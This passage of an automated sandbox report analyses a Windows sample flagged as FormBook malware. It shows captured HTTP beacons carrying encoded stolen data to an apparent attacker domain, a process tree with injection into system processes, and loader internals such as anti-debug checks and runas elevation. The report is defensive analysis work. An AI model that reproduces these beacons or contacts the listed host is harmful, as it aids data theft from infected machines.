Jan 10, 2025 20:28:07.510123014 CET	1774	OUT	POST /mv7p/ HTTP/1.1 Host: www.rtpterbaruwaktu3.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.rtpterbaruwaktu3.xyz Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 1232 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 30 56 4d 37 2f 41 6f 66 64 69 35 4f 61 33 57 53 51 6b 56 30 70 35 45 69 6c 6d 4d 76 58 78 68 62 6e 38 46 36 39 6d 77 49 32 32 6e 34 68 6e 4f 44 41 44 52 74 6b 56 48 71 2b 2b 39 74 58 7a 4e 39 31 36 43 55 45 42 39 63 56 74 42 6e 7a 48 55 7a 31 73 61 52 54 34 63 74 4f 5a 6b 6d 4c 61 58 72 47 6b 65 50 34 52 55 2f 70 66 4d 49 5a 6f 75 67 6f 63 70 73 77 33 58 62 32 4f 6f 75 54 5a 45 4a 49 39 34 38 4c 48 36 50 63 34 4c 5a 63 44 34 4f 4f 68 62 4c 31 68 77 38 33 6e 61 43 30 73 78 57 72 7a 73 55 64 4d 59 50 31 56 62 6e 2f 2b 6a 65 4a 4c 45 36 6f 76 62 44 36 75 47 58 4c 6b 4a 52 6a 39 51 69 31 6f 35 4c 49 51 31 70 6e 76 50 53 57 31 4c 52 36 47 79 2f 6a 49 56 42 55 79 6f 48 58 6c 46 34 57 4f 62 45 7a 55 7a 71 30 72 35 69 59 42 32 54 48 70 70 72 43 74 71 2f 41 71 49 4a 34 57 32 53 58 4b 4d 75 6e 74 4e 74 5a 2f 6c 51 49 47 6e 72 72 43 6d 2f 72 58 74 72 66 6d 34 56 5a 37 50 59 32 61 4e 32 38 49 50 42 76 75 4f 67 71 44 32 71 31 5a 64 38 51 7a 68 76 34 74 78 69 4c 4a 74 64 57 68 7a 30 73 6b [TRUNCATED] Data Ascii: KzB47nV=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI22n4hnODADRtkVHq++9tXzN916CUEB9cVtBnzHUz1saRT4ctOZkmLaXrGkeP4RU/pfMIZougocpsw3Xb2OouTZEJI948LH6Pc4LZcD4OOhbL1hw83naC0sxWrzsUdMYP1Vbn/+jeJLE6ovbD6uGXLkJRj9Qi1o5LIQ1pnvPSW1LR6Gy/jIVBUyoHXlF4WObEzUzq0r5iYB2THpprCtq/AqIJ4W2SXKMuntNtZ/lQIGnrrCm/rXtrfm4VZ7PY2aN28IPBvuOgqD2q1Zd8Qzhv4txiLJtdWhz0sk/wwVGq9UeIcHFQ6Nt9/DSv5wpOIOeCgumcdiFpatwzK3owwGceWMnLnvOM0zJYPtDV65iTqsFT3wnW4R68wb46TlMeUAjJi0LGPhAPCAIbWxdNpYdLG6L0a8Fp7YSOgtHEAbocwO3AZlEziIxWbT71u1qJqzSMgpMzs3uvRYCnYYy63icCkMpoSLjoyoqtdI9Uz4bPJSsgSzdfEKH3kKCgFEkhkpWGT0+GUGVvyCV5GT3fduvDVz+TbrcqpasBZNvEUpqWTk6Jl9PcSXwq6cq7NqeM+TCUxiiwQCaY8gMQTch5Xza70E2akOiukWyS0V3hg/OB0l7kBiBxRvfamK3+93p/n/WVnIkxRRTJWhTqfaoPaGTPPphtQ+lE6th9l+ymTaGwAHkmrF6Njw54FsjyASS1/cq54e9jdQS4MLvxgKNmEoQQQQ4MIamtIRD7UFg+i/Fkq/nzeo0yMVX7oiBrVDxFUdVNtNXlsI/p3BOsqG2KPNvOtcrNfcabAqNk4e+4pVgMw8IUnhnE5b1mnAGWODNZh73BSgMYaAOcPdpdCxiA2fTJ4D+6ye5Go1xQsJUbATQ5vcjYTzkk0lbD8n1xJPAIFrEcmtc521kcEUHImFr2h9/PXh9j5nURKrgNponUquwCNZpRKy0+5GDqS4HQshjy3WR5shHF [TRUNCATED]
Jan 10, 2025 20:28:08.393552065 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 19:28:08 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49991	103.21.221.87	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:28:10.046586990 CET	463	OUT	GET /mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr HTTP/1.1 Host: www.rtpterbaruwaktu3.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 10, 2025 20:28:11.289968967 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 19:28:10 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Jan 10, 2025 20:28:11.290047884 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 19:28:10 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Target ID:	0
Start time:	14:26:08
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\aBEh0fsi2c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\aBEh0fsi2c.exe"
Imagebase:	0x360000
File size:	1'183'744 bytes
MD5 hash:	AE1FE8E567226C914DC9A747E25D2118
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:26:12
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\aBEh0fsi2c.exe"
Imagebase:	0xab0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:26:38
Start date:	10/01/2025
Path:	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe"
Imagebase:	0x8d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:26:41
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\winver.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\winver.exe"
Imagebase:	0x820000
File size:	57'344 bytes
MD5 hash:	B5471B0FB5402FC318C82C994C6BF84D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	14:26:53
Start date:	10/01/2025
Path:	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe"
Imagebase:	0x8d0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:27:10
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 00363B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
IsDebuggerPresent.KERNEL32 ref: 00363B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

Part of subcall function 0037092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00417770,00000010), ref: 0039D281
SetCurrentDirectoryW.KERNEL32(?,004252F8,?,?,?), ref: 0039D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00414260,004252F8,?,?,?), ref: 0039D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0039D346

Part of subcall function 00363A46: GetSysColorBrush.USER32(0000000F), ref: 00363A50
Part of subcall function 00363A46: LoadCursorW.USER32(00000000,00007F00), ref: 00363A5F
Part of subcall function 00363A46: LoadIconW.USER32(00000063), ref: 00363A76
Part of subcall function 00363A46: LoadIconW.USER32(000000A4), ref: 00363A88
Part of subcall function 00363A46: LoadIconW.USER32(000000A2), ref: 00363A9A
Part of subcall function 00363A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00363AC0
Part of subcall function 00363A46: RegisterClassExW.USER32(?), ref: 00363B16

Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00363A03
Part of subcall function 003639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00363A24
Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A38
Part of subcall function 003639D5: ShowWindow.USER32(00000000,?,?), ref: 00363A41

Part of subcall function 0036434A: _memset.LIBCMT ref: 00364370
Part of subcall function 0036434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415

Strings

runas, xrefs: 0039D33A
%?, xrefs: 00363C44
This is a third-party compiled AutoIt script., xrefs: 0039D279

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%?
API String ID: 529118366-505933256
Opcode ID: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
Instruction ID: 84c90862d69b1908313bcc720b2043c86ee5caf731bdb4c51ecfe2706ff1c8f0
Opcode Fuzzy Hash: 964ed0258bf669d27132c26e2bcea4c9b22323f0dd5e5bca200027297c424831
Instruction Fuzzy Hash: B5510730A08148EECF23EBB4EC46AFD7B78AB45300F90C1A5F451AA1E5CBB45642CB34

Function 003649A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 003649CD

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

GetCurrentProcess.KERNEL32(?,003EFAEC,00000000,00000000,?), ref: 00364A9A
IsWow64Process.KERNEL32(00000000), ref: 00364AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00364AE7
FreeLibrary.KERNEL32(00000000), ref: 00364AF2
GetSystemInfo.KERNEL32(00000000), ref: 00364B23
GetSystemInfo.KERNEL32(00000000), ref: 00364B2F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
Instruction ID: f70a066286bf5b8991631b3e79af4961e3aaf7cfa638d73ce7166b51439a9d26
Opcode Fuzzy Hash: 0e55340853a1fd778bb37495be33eba950969f65477e9539c70b63723ec7689c
Instruction Fuzzy Hash: BD91C63198D7C4DECB33DBA8C5511AAFFF5AF2A300B448AADD0CB97A45D220E548C759

Function 00364E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00364D8E,?,?,00000000,00000000), ref: 00364E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00364D8E,?,?,00000000,00000000), ref: 00364EB0
LoadResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D937
SizeofResource.KERNEL32(?,00000000,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F), ref: 0039D94C
LockResource.KERNEL32(00364D8E,?,?,00364D8E,?,?,00000000,00000000,?,?,?,?,?,?,00364E2F,00000000), ref: 0039D95F

Strings

SCRIPT, xrefs: 00364EA6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
Instruction ID: 49d91c74f0c587d362949b36e1b0b018ed2ebd59c3986e4b33397a42596ecd6f
Opcode Fuzzy Hash: 5b294fb96a21861bea3ffca30c2a32277d80edf9c0433ad420f7309238a43f3d
Instruction Fuzzy Hash: 37115175640741BFD7228B65EC48F677BBDFBC6711F108668F5159A190DBA1EC008660

Function 0036FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pbB, xrefs: 003A49B9
%?, xrefs: 0036FCF3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbB$%?
API String ID: 3964851224-3075198358
Opcode ID: 7e75c99aa72eadd02bdb2eb20a64936542a142f34c7f5cee52a82994b9d394aa
Instruction ID: 5b63de59d6533bafd43b3b7282b03c8ca80ff3849b0f20d53225f72840a14503
Opcode Fuzzy Hash: 7e75c99aa72eadd02bdb2eb20a64936542a142f34c7f5cee52a82994b9d394aa
Instruction Fuzzy Hash: 73927874608341CFD726DF24C480B2AB7E4FF89304F15896DE89A9B262D775EC45CB92

Function 0036E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DdB, xrefs: 0036EABA
Variable must be of type 'Object'., xrefs: 003A3E62
DdB, xrefs: 003A3B2E
DdB, xrefs: 003A3AF5
DdB, xrefs: 0036EAC1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID: DdB$DdB$DdB$DdB$Variable must be of type 'Object'.
API String ID: 0-4073077587
Opcode ID: 1f2c7e90e4c56aa22d1d92ea01cf72bd6abfe232c097f99e3ec7c86cab36013c
Instruction ID: 324cfab5ffee2a3f24db67aa02fc8c37d1779d7524ce526840952430082b1250
Opcode Fuzzy Hash: 1f2c7e90e4c56aa22d1d92ea01cf72bd6abfe232c097f99e3ec7c86cab36013c
Instruction Fuzzy Hash: 3CA2C178A00215CFCB26CF98C480AAEB7B5FF59310F65C069E805AB359D775ED4ACB90

Function 003647D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00364834

Part of subcall function 0038336C: __lock.LIBCMT ref: 00383372
Part of subcall function 0038336C: DecodePointer.KERNEL32(00000001,?,00364849,003B7C74), ref: 0038337E
Part of subcall function 0038336C: EncodePointer.KERNEL32(?,?,00364849,003B7C74), ref: 00383389

Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00364915
Part of subcall function 003648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0036492A

Part of subcall function 00363B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00363B68
Part of subcall function 00363B3A: IsDebuggerPresent.KERNEL32 ref: 00363B7A
Part of subcall function 00363B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004252F8,004252E0,?,?), ref: 00363BEB
Part of subcall function 00363B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00363C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00364874

Strings

8], xrefs: 003647D6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

